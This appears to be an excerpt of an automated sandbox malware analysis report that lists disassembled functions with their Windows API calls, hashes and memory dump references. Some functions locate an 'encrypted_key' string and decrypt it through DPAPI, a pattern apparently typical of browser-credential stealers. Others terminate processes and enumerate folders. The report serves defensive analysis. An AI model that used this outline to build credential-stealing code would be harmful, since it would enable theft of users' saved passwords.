                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A59D39
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                                • Part of subcall function 00A59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                                • Part of subcall function 00A59AC0: LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                                • Part of subcall function 00A59B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A59B84
                                • Part of subcall function 00A59B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A59BA3
                                • Part of subcall function 00A59B60: LocalFree.KERNEL32(?), ref: 00A59BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: f7a93cc8a59001a4bf298502b5ae15cbc3e4e4b8b8c9542db0c476652ed29b9d
                              • Instruction ID: 50515bff9276d4fb6f607ac830845c7e726a81e748025d8215785b9190a96ff2
                              • Opcode Fuzzy Hash: f7a93cc8a59001a4bf298502b5ae15cbc3e4e4b8b8c9542db0c476652ed29b9d
                              • Instruction Fuzzy Hash: FB3132B6D10209EBCF14DFE4DD85AEF77B8BF48305F144519E905A7241E7359A08CBA1
                              Function 00A694D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00A694EB
                                • Part of subcall function 00A68D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A6951E,00000000), ref: 00A68D5B
                                • Part of subcall function 00A68D50: RtlAllocateHeap.NTDLL(00000000), ref: 00A68D62
                                • Part of subcall function 00A68D50: wsprintfW.USER32 ref: 00A68D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00A695AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A695C9
                              • CloseHandle.KERNEL32(00000000), ref: 00A695D6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 34482029817a6cc9ab8c5749d90091ba724abe54bfca4ae20f71858a4843a2bb
                              • Instruction ID: c9a45f9e0d0b2387cca5f60d8b27bcdf5d72e506b1ffd2c5bfe37644752451d7
                              • Opcode Fuzzy Hash: 34482029817a6cc9ab8c5749d90091ba724abe54bfca4ae20f71858a4843a2bb
                              • Instruction Fuzzy Hash: 24310C71E00218DFDB14DFD0CD49BEEB778EB54700F104559E506AB184DB74AA89CF96
                              Function 00A692E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00A63AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A63AEE,?), ref: 00A692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00A63AEE), ref: 00A69319
                              • CloseHandle.KERNEL32(000000FF), ref: 00A69327
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 7b527969dadf4cd946bc96584a1f9b08cb3b8c293ef33d50424475fbdb307a78
                              • Instruction ID: 872aa52141a480c64b3787ece3b5cfe222aa6cf14d349b2f0c02062700db8fd2
                              • Opcode Fuzzy Hash: 7b527969dadf4cd946bc96584a1f9b08cb3b8c293ef33d50424475fbdb307a78
                              • Instruction Fuzzy Hash: EDF0FF75E44208BBDB10DFF5DC49F9E77B9AB48710F10C658BA51AB2C0DA7496018B81
                              Function 00A6C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00A6C74E
                                • Part of subcall function 00A6BF9F: __amsg_exit.LIBCMT ref: 00A6BFAF
                              • __getptd.LIBCMT ref: 00A6C765
                              • __amsg_exit.LIBCMT ref: 00A6C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A6C797
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4a50b667dbe94db66810956208c8f0d4791045e9aa742d6c7c3e1c73cfe7f306
                              • Instruction ID: 42e567919e7a678b4ebbb903380b954b0f574e7a78f0344de73598d700940fd8
                              • Opcode Fuzzy Hash: 4a50b667dbe94db66810956208c8f0d4791045e9aa742d6c7c3e1c73cfe7f306
                              • Instruction Fuzzy Hash: F1F0B432911310DFD721BBB89D0776E33B0AF00B30F208149F555E61D2DF6499819F6A
                              Function 00A64F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64F7A
                              • lstrcat.KERNEL32(?,00A71070), ref: 00A64F97
                              • lstrcat.KERNEL32(?,01448A58), ref: 00A64FAB
                              • lstrcat.KERNEL32(?,00A71074), ref: 00A64FBD
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A6492C
                                • Part of subcall function 00A64910: FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                                • Part of subcall function 00A64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                                • Part of subcall function 00A64910: FindClose.KERNEL32(000000FF), ref: 00A64B92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 1dbdfcf32cffc6597e7b67193074a17b7ca47a58529727b5f5e8580fc7fdc117
                              • Instruction ID: 01affd21f7b85aedf22b741271087f4f2a1b861506d13807156773d303feab94
                              • Opcode Fuzzy Hash: 1dbdfcf32cffc6597e7b67193074a17b7ca47a58529727b5f5e8580fc7fdc117
                              • Instruction Fuzzy Hash: 51215677900208A7CB54FBB0DD4AFEE337CBB58700F008555B65997181EE749AC98BE2